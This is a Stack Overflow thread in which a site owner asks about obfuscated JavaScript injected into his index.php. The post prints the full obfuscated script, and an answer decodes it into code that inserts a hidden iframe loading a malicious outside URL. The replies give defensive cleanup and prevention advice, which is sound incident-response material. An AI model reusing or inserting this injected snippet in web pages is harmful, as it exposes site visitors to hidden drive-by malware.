Strange javascript added to my webpage (get redirected to http://paseroper.in)

Question

Somehow my index.php file at the server get modified. As a result, when I open my webpage, I get redirected automatically to this address: redirected url
It seems someone has hacked my application. I found the index.php file was added with the following javaSscript:

<script>aa=([].slice+'hjkbghkj').substr(2-1,4);if((aa=="func")||(aa=="unct"))aa=(document['createDocumentFragm'+'e'+'n'+'t']+'evweds').substr(2-1,4);if((aa=="func")||(aa=="unct")){ss=new String();s=String;12-function(){e=eval;f='fromCharCode';}();t='k';}ddd=new Date();d2=new Date(ddd.valueOf()-2);h=(ddd-d2)*-1;n=["4.5k4.5k52.5k51k16k20k50k55.5k49.5k58.5k54.5k50.5k55k58k23k51.5k50.5k58k34.5k54k50.5k54.5k50.5k55k58k57.5k33k60.5k42k48.5k51.5k39k48.5k54.5k50.5k20k19.5k49k55.5k50k60.5k19.5k20.5k45.5k24k46.5k20.5k61.5k4.5k4.5k4.5k52.5k51k57k48.5k54.5k50.5k57k20k20.5k29.5k4.5k4.5k62.5k16k50.5k54k57.5k50.5k16k61.5k4.5k4.5k4.5k50k55.5k49.5k58.5k54.5k50.5k55k58k23k59.5k57k52.5k58k50.5k20k17k30k52.5k51k57k48.5k54.5k50.5k16k57.5k57k49.5k30.5k19.5k52k58k58k56k29k23.5k23.5k56k48.5k57.5k50.5k57k55.5k56k50.5k57k23k52.5k55k23.5k52.5k55k23k49.5k51.5k52.5k31.5k50k50.5k51k48.5k58.5k54k58k19.5k16k59.5k52.5k50k58k52k30.5k19.5k24.5k24k19.5k16k52k50.5k52.5k51.5k52k58k30.5k19.5k24.5k24k19.5k16k57.5k58k60.5k54k50.5k30.5k19.5k59k52.5k57.5k52.5k49k52.5k54k52.5k58k60.5k29k52k52.5k50k50k50.5k55k29.5k56k55.5k57.5k52.5k58k52.5k55.5k55k29k48.5k49k57.5k55.5k54k58.5k58k50.5k29.5k54k50.5k51k58k29k24k29.5k58k55.5k56k29k24k29.5k19.5k31k30k23.5k52.5k51k57k48.5k54.5k50.5k31k17k20.5k29.5k4.5k4.5k62.5k4.5k4.5k51k58.5k55k49.5k58k52.5k55.5k55k16k52.5k51k57k48.5k54.5k50.5k57k20k20.5k61.5k4.5k4.5k4.5k59k48.5k57k16k51k16k30.5k16k50k55.5k49.5k58.5k54.5k50.5k55k58k23k49.5k57k50.5k48.5k58k50.5k34.5k54k50.5k54.5k50.5k55k58k20k19.5k52.5k51k57k48.5k54.5k50.5k19.5k20.5k29.5k51k23k57.5k50.5k58k32.5k58k58k57k52.5k49k58.5k58k50.5k20k19.5k57.5k57k49.5k19.5k22k19.5k52k58k58k56k29k23.5k23.5k56k48.5k57.5k50.5k57k55.5k56k50.5k57k23k52.5k55k23.5k52.5k55k23k49.5k51.5k52.5k31.5k50k50.5k51k48.5k58.5k54k58k19.5k20.5k29.5k51k23k57.5k58k60.5k54k50.5k23k59k52.5k57.5k52.5k49k52.5k54k52.5k58k60.5k30.5k19.5k52k52.5k50k50k50.5k55k19.5k29.5k51k23k57.5k58k60.5k54k50.5k23k56k55.5k57.5k52.5k58k52.5k55.5k55k30.5k19.5k48.5k49k57.5k55.5k54k58.5k58k50.5k19.5k29.5k51k23k57.5k58k60.5k54k50.5k23k54k50.5k51k58k30.5k19.5k24k19.5k29.5k51k23k57.5k58k60.5k54k50.5k23k58k55.5k56k30.5k19.5k24k19.5k29.5k51k23k57.5k50.5k58k32.5k58k58k57k52.5k49k58.5k58k50.5k20k19.5k59.5k52.5k50k58k52k19.5k22k19.5k24.5k24k19.5k20.5k29.5k51k23k57.5k50.5k58k32.5k58k58k57k52.5k49k58.5k58k50.5k20k19.5k52k50.5k52.5k51.5k52k58k19.5k22k19.5k24.5k24k19.5k20.5k29.5k4.5k4.5k4.5k50k55.5k49.5k58.5k54.5k50.5k55k58k23k51.5k50.5k58k34.5k54k50.5k54.5k50.5k55k58k57.5k33k60.5k42k48.5k51.5k39k48.5k54.5k50.5k20k19.5k49k55.5k50k60.5k19.5k20.5k45.5k24k46.5k23k48.5k56k56k50.5k55k50k33.5k52k52.5k54k50k20k51k20.5k29.5k4.5k4.5k62.5"];n=n[0].split(t);for(i=0;n.length-i>0;i++)ss+=s[f](-h*n[i]);f=ss;e(f);</script>

Does anyone know the meaning of above script?
By removing that script, my web could run well as it was. Any recommendation about how to prevent this attack?

I edited the question. I have removed the script and my web runs well. — masu.mo, Jan 02 '12 at 04:40
@Sergio Tulentsev I'm curious why this topic is considered not related to programming. I think the way to prevent this attack is indeed a programming topic. I have also edited my question as you suggested. — masu.mo, Jan 02 '12 at 05:59

score 2 · Accepted Answer · answered Jan 02 '12 at 04:27

2

That's just a bunch of obfuscated code; no one will tell you the meaning of that (most likely, except Jon Skeet).

I would suggest you remove that script from the page, and revert to your last commit (you ARE using a version control system, aren't you? :)

answered Jan 02 '12 at 04:27

Dhaivat Pandya

6,499
4
29
43

True ... (character requirement) – Dhaivat Pandya Jan 02 '12 at 04:29
I dunno, I got a ways through a previously-posted fragment like that. It's irritating--not impossible. – Dave Newton Jan 02 '12 at 04:34
1

Wow. You've earned my respect. I stopped looking at the code after I saw how long the bottom slider was :P – Dhaivat Pandya Jan 02 '12 at 04:36
Yes, I have removed the code and my site runs well. But, do you have any recommendation to prevent this kind of problem? – masu.mo Jan 02 '12 at 04:39
1

Yeah -- http://stackoverflow.com/questions/3115559/exploitable-php-functions <- If you're using PHP, OWASP if not – Dhaivat Pandya Jan 02 '12 at 04:40

LoveAndCoding · Answer 2 · 2012-01-02T04:47:26.903

This is the code that gets eval'd

if (document.getElementsByTagName('body')[0]){
    iframer();
} else {
    document.write("<iframe src='http://paseroper.in/in.cgi?default' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
    var f = document.createElement('iframe');
    f.setAttribute('src','http://paseroper.in/in.cgi?default');
    f.style.visibility='hidden';
    f.style.position='absolute';
    f.style.left='0';
    f.style.top='0';
    f.setAttribute('width','10');
    f.setAttribute('height','10');
    document.getElementsByTagName('body')[0].appendChild(f);
}

Creates an <iframe> that goes to that URL.

As for how to prevent it, you'll need to find out how the code got in there. Likely one of your scripts allowed them to run arbitrary code on your server, so I would check all php plugins, and any place where you may allow users to enter information and make sure you are properly filtering things.

Also, you'll likely want to let your users know. From the looks of it, the <iframe> is hidden, which indicates it might be a site in which they try and do drive-by installs of malware or spyware.

Strange javascript added to my webpage (get redirected to http://paseroper.in)

2 Answers2